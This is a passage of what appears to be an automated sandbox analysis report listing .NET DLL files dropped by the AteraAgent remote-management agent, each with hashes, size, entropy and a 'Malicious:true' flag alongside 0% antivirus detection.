                                                                                                                                                                                                                                                                                              SSDEEP:768:4i4PV4eWxaVsQLqyCekI/q/xGljnEpYi60kmub:4aVxa2QXUxajA763db
                                                                                                                                                                                                                                                                                              MD5:57D7440298C07A43F1FEFE0BAC5FCC43
                                                                                                                                                                                                                                                                                              SHA1:82A9581F06E3FCBFED42A39E85EA83CCEE8FD48E
                                                                                                                                                                                                                                                                                              SHA-256:690F1D74CF5A652D988233991B0D1702B84E7EBAEEFF56A071877CF0C31D060B
                                                                                                                                                                                                                                                                                              SHA-512:76F990B7A6ACAD8F592FEA9E0B802B4B227A15EDE072BA87B57154F339873C61C576BFA4F9FEF1307A8BED5269C32F28EFABA9C039EE895F79B2B26D91F25D93
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44624
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.259394998120094
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:/8+cxuPn//hpz2XCkCkCdvAb4b4qox06OoV0F8l0HCTpw0wo0emWEpYi60s+:k+cxuPn/bvvE0Q0HCNfBsX76P+
                                                                                                                                                                                                                                                                                              MD5:B90E964326DE0C8B88FEC1B41E37BE3A
                                                                                                                                                                                                                                                                                              SHA1:5FA376EFF79CB42669A7D8336494C06A3CCE157D
                                                                                                                                                                                                                                                                                              SHA-256:42D911959EEAA89203052A878A7F68E847E487E967F418C9C6904E956BE22FCF
                                                                                                                                                                                                                                                                                              SHA-512:D3F9A84E3BB06E1C72EE9691988DDE62A105FD07EAB17B22A59A69F8F7A7DA54734BF8633D9DD92E24F094F908B4BE61154627F391338F9F60FE1D15094C4651
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):82512
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2802579422578315
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:/NLmvi666OjIX0h9zMPvHBWCaRweUG4DynjEZnBU76g:J66fjLb8vH0CiUG4DyneBUr
                                                                                                                                                                                                                                                                                              MD5:EEDAB98D5F5A53C61ECFF3DCA033B5B1
                                                                                                                                                                                                                                                                                              SHA1:AA04C41DA7B0B85F9E1FAF797E2FA48C9D7F9F9C
                                                                                                                                                                                                                                                                                              SHA-256:5F0E0CBEAE8F88516A9CF9991AC7B2A86B6135214B5F0DABF9312919AB33AFF7
                                                                                                                                                                                                                                                                                              SHA-512:12BA31C5A55EBFC392B2C5916DAB4A5C25DCB2EDBCF3B9CCCAF7F9841FE31EB45A45B927F69ED90C5DA9C13C32F61500136004245563D0DA2C5D1C44377F1AD5
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22096
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.571092050997703
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:TlfkJv/RYTWl6+MTxMufuMc8CWsbhWNNyb8E9VF6IYijSJIVxU3iFZb:TlcJnRYTwIjJ66EpYi60tZb
                                                                                                                                                                                                                                                                                              MD5:EAAA8C11C7D2A7AB2593E00D669FFCDF
                                                                                                                                                                                                                                                                                              SHA1:672037C7C38474C9F53815FC3C9E2925E9404DBE
                                                                                                                                                                                                                                                                                              SHA-256:CF9DC1C970C7E6BD70A139E4BBC591FA1A97A3DF382C86E806A9F1B3271AF551
                                                                                                                                                                                                                                                                                              SHA-512:2920F77C47E2A3FAB5760DCADBDF3ED68D09B81ED46CB16469CEC367B4EAF6842B0F9918B99E7BE09788C8D817FAD9B3A52402DEA20383D6832D69CFF5209C87
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):43600
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.434975332952962
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:qHxWCQ4MPJG3cOeeapdUgsWflN+Qu5sEpYi60b:qHxW58re3pdUqN5u5l76+
                                                                                                                                                                                                                                                                                              MD5:D2419C8E9CEE2128F892BAE0334A37E5
                                                                                                                                                                                                                                                                                              SHA1:86EF28CFDA0821E7B426B7451ED348E1C077095D
                                                                                                                                                                                                                                                                                              SHA-256:F3BE4F0128FCCEB85499F5AD3463929AE8E93C0A075A569E1B25BFE88F63A234
                                                                                                                                                                                                                                                                                              SHA-512:018BB02E7E783CA1B0B2341319494285CA9B0699261A89E0CF15D7165D1757EED559A2BCD7E25E6C7204097312F70A840CA3051C4459732BC3616BB8C771B9A1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45136
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.354947891419325
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:qlwMU3jMMSPNueKQWjRUILOK2Ksf/qSCgHgUsJ5EpYi605:quMUJqLWjRHFtsHqSCgHgUsJC768
                                                                                                                                                                                                                                                                                              MD5:9A677FB8A444488A7887BE910598539E
                                                                                                                                                                                                                                                                                              SHA1:F9470CA9A9BC0C971425668106F0811B3615071E
                                                                                                                                                                                                                                                                                              SHA-256:827DBA0A8A6592252544374CF0891EB71BDBB419646DF8FAE38327F7FC6452E0
                                                                                                                                                                                                                                                                                              SHA-512:B82690A85ED969F553EEE3E973D9EFB53FB7B96104BF59626B11D389D4BCA62D01118A2F9DD1690EE248CD2C048AC99F128188694CDC878CBB5B324CCDE8C41B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):28752
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.563026480365638
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:nfGp7YacaEaVNbG12flBF76euwMw0tXXVfFQkzsG9kni7QXRdQWibdW/Nyb8E9Vg:VwVNz9BF76ejMbmHXRQEEpYi608
                                                                                                                                                                                                                                                                                              MD5:0B53E20335B2F60BEA3A24F521C3722D
                                                                                                                                                                                                                                                                                              SHA1:8BDC869C12CDC878C6FB48AB6E23C3621B45C5AE
                                                                                                                                                                                                                                                                                              SHA-256:4C67D8989C89C4553ADAD3854DD78392B046A1ABCDC6A27163144FAB16BEAF0B
                                                                                                                                                                                                                                                                                              SHA-512:5E093C26B492D961A4D6C32A5933BBB6F697C1826A08FA26DA8BB1F7E5C1625E5E84EA51BCAC13E5AFEBCD928AD8E7DFD0BF6D35C2B8846F41B2298CEF8E29CB
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):56400
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.30415225033415
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:sBu8CE7AFg+0ITvhADGmnnbaTfP63+R3u9q09ePEpYi608LAed:scfWA2+DjaD/nnba+3uwq09eo76vNd
                                                                                                                                                                                                                                                                                              MD5:942F74ACE0A1AD5D7FB33396775886CF
                                                                                                                                                                                                                                                                                              SHA1:44176E149A2E636B07C5337DC2436058D3482941
                                                                                                                                                                                                                                                                                              SHA-256:332C188781DB51141C21FDA8856A7B5B72869F2BCDA9F15E16A443A9D7AAAA89
                                                                                                                                                                                                                                                                                              SHA-512:26C3D2E31242CC805F425226D2EC28CA2C2C89079F3C3A7BD9C91A42CB62CAF9CBB3D2605E49F2AA6B0271B9FA9C823E004383454760EE8E78D601108BFCABFA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):63056
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2857708531976195
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:S+UfRQY8PGNWovMLJYBjtLgnuAAAAAknwd45FnrfMq1/yJuoiYblHJg6GOmDuZEr:S+tY8PIiq51wcFnDMsno7jRmai76+
                                                                                                                                                                                                                                                                                              MD5:8E7BC8F33E83F98BC5112D8DF48FA624
                                                                                                                                                                                                                                                                                              SHA1:E63BBFC1452DB5EA6A57A1B5AE50E2C03E758A29
                                                                                                                                                                                                                                                                                              SHA-256:DD73348A85A38D063A0DDFED8EF10DAACC1C30CC3AE801E9D098EDF8E4833EA2
                                                                                                                                                                                                                                                                                              SHA-512:B0A6254F2B4DB36614DFD2B2C2F6CAE70C6504ABBAC5F18139590AAC4DD71DC11B5D0102AFF85E92660F917D752193F117273A934575D0A55441A9F1DB0AAE7E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27728
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.551066390151139
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:Rr0yw26S3QgV/UxNmsUspvnipmgNRLGc3WxsBU7RWPpNyb8E9VF6IYijSJIVxfj8:Rr0j26i92L6zBU7qEpYi60m7
                                                                                                                                                                                                                                                                                              MD5:0B26D5C7509CE13F88CEDD513719750E
                                                                                                                                                                                                                                                                                              SHA1:95014FA4FB133B6F9810D03AB7C0556DAC22E4D2
                                                                                                                                                                                                                                                                                              SHA-256:C85323605DFDE235F9C0E7C8AB25FEB3BFDE3CDD10A53BF86352992375A02228
                                                                                                                                                                                                                                                                                              SHA-512:482492B666A970CF662E1B334885102B047B73A48685FDB1ED62BA59E2F954AECA4233E8DD19FB631C165505D7B665A848CF12582261A98F09BB5151AE390C04
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51280
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.366090837889375
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:TTGWFIlYoY5b3OxMZnndnnennnnnnRt3nV+JEtpzU+uujK2lBJqFsSjKcb72EpYO:TiKIe9JyvSCG2l+NT76w
                                                                                                                                                                                                                                                                                              MD5:01C3D505F70553DA5CE5749B2072598F
                                                                                                                                                                                                                                                                                              SHA1:F968657B17033E6C3DE5EE33F829EDAC3C0A9902
                                                                                                                                                                                                                                                                                              SHA-256:41BB9C82269D3880590C76AE5D918CBD2F9A9A985E14167EDD4C46BC01EF0C57
                                                                                                                                                                                                                                                                                              SHA-512:03A7A8D0DED1E071364C9F3C50AE6CD3DBE8B7E3D2DD7EDFA1DCD4D7A7150FA68F3E0DB67856F35ADA57D807A21B703B11293E9DA2A49B94E5D801633568AB4A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):19024
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.631317912248179
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:mv+kBD/v7WJZVMWurNyb8E9VF6IYijSJIVxCb70T:mmMbumEpYi60GAT
                                                                                                                                                                                                                                                                                              MD5:8E9B5EF88B7EBD9A0CC4E648B7C061B6
                                                                                                                                                                                                                                                                                              SHA1:E67049110D70876111CCBE4303AC577797F4AA6C
                                                                                                                                                                                                                                                                                              SHA-256:C2F3C2BED46301899721451BAF54E7703B1F803F5B91C88BFF6094D4970580E3
                                                                                                                                                                                                                                                                                              SHA-512:CD0D600C8C6D42BC8FBFEFDC58E633BBE46398FD3ECB98601B8AD4DF88E4F547A937D9596DCC7A3CEB495F9828784CEE1F1EF1230380443A23E8C8F26123ECF8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25168
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.59691314093314
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:JzTu6iOUdGgvklNpdOHhvVhZQVW27FWcNyb8E9VF6IYijSJIVxC/po:JziZOwklFYh43EpYi60b
                                                                                                                                                                                                                                                                                              MD5:7736B59E467AAEFA0EFA73937BE65733
                                                                                                                                                                                                                                                                                              SHA1:FDE46F878FF3FDFFDACFECD9B0D86C21520F684F
                                                                                                                                                                                                                                                                                              SHA-256:99AED0C536B3D9105D952A7D1C98CC19695BA80971904D3502E81E296391F09C
                                                                                                                                                                                                                                                                                              SHA-512:6F0EAB6E45B8BDE078D34A6355FD2292AAD514BB413ACF58CF3385262F84215E53AE3900508A11EFC693D447B440F5D1D4C8D312908554B3624AC1A4E8F92F75
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):33872
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.561493627348274
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:B2x4wbbh7Kx8kJ3yiW8/zKeGmBt1qm1CS1yvhGcRtquW3LUWbNyb8E9VF6IYijSn:fwvh7KxdlW8JvrpEpYi602f
                                                                                                                                                                                                                                                                                              MD5:C293C0DA6B9366B6C4D4CBB97150CDD7
                                                                                                                                                                                                                                                                                              SHA1:B02EF2864D7194803FAADAFD31CF5E7C8B1B98E5
                                                                                                                                                                                                                                                                                              SHA-256:E32AA53CF8D54AA0B34274E654B40ABDBCFFBE7024EC4B72DF8EC7F9AFCD0BB2
                                                                                                                                                                                                                                                                                              SHA-512:3ACEBB0DD1AE6A69BEB0C1AF55608EAE28AAD67523B93A7F8C277692EAF4A40D8565E8512B74F13661A217A2824E27A44E3655E727E2A63AF0E2469737EBF17F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):45648
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.39363345514802
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:/X8pDT8XP6hA+wMaLWCzAVLOPnaEpYi60w+:/XiDTaP6hfY1GOPnb76P+
                                                                                                                                                                                                                                                                                              MD5:71A04A924FBC5D648EF852284D931ACC
                                                                                                                                                                                                                                                                                              SHA1:51911CEFFE2FF1D7260BDF5CDF2C39929E1E1996
                                                                                                                                                                                                                                                                                              SHA-256:7E4871BFBD64B01CF0876A0BF02099528FE130ADF31BDEB1016DC06206DD6AA7
                                                                                                                                                                                                                                                                                              SHA-512:891006019659170422FB955B1153BB30F954DDFB758E3EB56E299642D7AB679741B1D37BB1850A900E25A4FA0B1C91FFDBA6B4A63D14C799E5686260B1F02FFE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):23632
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.628913155600511
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:toePm+VIkOdHt6Zx8HignlSZYT9zWzL0WVNyb8E9VF6IYijSJIVxD7PqF6h:fPzVIko9FD9o3EpYi60nXh
                                                                                                                                                                                                                                                                                              MD5:1D1C608F502F58F376EBAADE561720F1
                                                                                                                                                                                                                                                                                              SHA1:82CEE758BAF30579113C1C43ACF49B4A7535BD65
                                                                                                                                                                                                                                                                                              SHA-256:685A5A14916A154BF39448A766D85E6B2BD8750C053C7AAFF43F7C75B6EB634E
                                                                                                                                                                                                                                                                                              SHA-512:BF62B2EFBDC38C54AB5DDC1A0C2BF5B6EFAF875742A99F7A74FC4F809EC9E205DE2DB168A9DD5B66842C103FBD80515F515D1D04AF6E159BB00DD6CD56014B65
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):59984
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.314915840218046
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:DCD3yk2B8+9PwwOxC8wZLq6J4q2r0qafouRVPvW37EpYi60xRVt:+kB8+94xxBmm6mqaBafouRdi076YVt
                                                                                                                                                                                                                                                                                              MD5:07DB1E7841F9B711613F9D36B49FD292
                                                                                                                                                                                                                                                                                              SHA1:263A9888E154918D874F5ADC78F16525906FE7C7
                                                                                                                                                                                                                                                                                              SHA-256:F63F865D19B252F8CBFD44BFB2C67542734E88D2A8BD720336FD3002A86D97BD
                                                                                                                                                                                                                                                                                              SHA-512:8A73E111E98EDEC333999DFC2930747486D463F40BBA89F486AB037546E61C82ED57FCEBE9C76ECB487596F98F65B2D76D0357B379810FC1F82B4BF79B137757
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41040
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.338955490792153
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Glx+oQSHqk49NI0OP7NWEfDkkuiEk3LVi4EpYi60wk:QVQSyI0OP7NxfAkuiEkbwB76I
                                                                                                                                                                                                                                                                                              MD5:2346448FC8741FDD8CB2FEC4A13A09C6
                                                                                                                                                                                                                                                                                              SHA1:302E59E4AC137233191D1E0A4D09FD1E7D6A0D21
                                                                                                                                                                                                                                                                                              SHA-256:88006DB3BA1F287D2F2389EE59A72CFB3E3076297A5EA0B1DA5BC1AE6991ECF2
                                                                                                                                                                                                                                                                                              SHA-512:34435E18F0E19DE9627D28EF3FC572A96C16E1DADF8B58632C9B0FC90F2C05D3568A87619A46C59E82B199D1AD3132C4B7D340A699B7E14D60A1A621E7BA8A95
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):697936
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.9631065670925505
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:+eos/POdGV5jfWrV/9Yeh9eRcyLfLYtT5mWxTZ/B7jW5JMtRRpKzQy:+0/POdGV5jfW5VnhFyvOB7jW5JMt0
                                                                                                                                                                                                                                                                                              MD5:199D5DA16448D57D9688B0FC45798C9D
                                                                                                                                                                                                                                                                                              SHA1:6063CCCDA4939CF8C943D663A475E0D190BBEE21
                                                                                                                                                                                                                                                                                              SHA-256:D80BBBEA555AB41EEB4A9BE225392F699E2DE379A5814D3ACE544CCC74615353
                                                                                                                                                                                                                                                                                              SHA-512:F2DDBD15834ABDE4CB49F60A5A1919F0B2EA633ED601050A541F095B1EF43B2A5BDB59781E81380A5A3D24DF37F4D986F088172C61799D33B2E4018EEB877652
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):285776
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.198436452323558
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:+MiAQB4wmESyxV8pj06e4isQ8gsHsjb/W1DBZ7DhsNcOb:+MZpj06vUsMjbQ77D+j
                                                                                                                                                                                                                                                                                              MD5:E93FC4EAAD9EA0C4EFAE4A9BB02D3498
                                                                                                                                                                                                                                                                                              SHA1:2448FEB521F3380C97E9DE43222B837DC5CD7D46
                                                                                                                                                                                                                                                                                              SHA-256:FFC830BABC6AE1A9CA0015741935D5295C8F217E562BF5394EDA81017706A0EA
                                                                                                                                                                                                                                                                                              SHA-512:147A185BCCA17B0F41234145F53FF3AFC2F8E9B41298144DC09A6E46653669BC221E3A293BD6252C91342295D866AFA61B66FAB09BD49D68C8D86D1F1F3B1270
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):38992
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.292917096352768
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:pdfuvOXFXW/8O6bXD+eeIgLPRsnHnyhQupytM9z7O3zfXYvj8rbPH5nTLhCPsIdk:pxuJRRsnHnyhQupytM9z7O3zfXYvj8rX
                                                                                                                                                                                                                                                                                              MD5:844D54BBD438B9A7669244D635F5ABC9
                                                                                                                                                                                                                                                                                              SHA1:930E1A3E21F1D499121D6071B6A6826FA38F0A55
                                                                                                                                                                                                                                                                                              SHA-256:632E3017C032CE66014A51E89D0A8A43E9AEFF0E0018FB835D88283B547A86A5
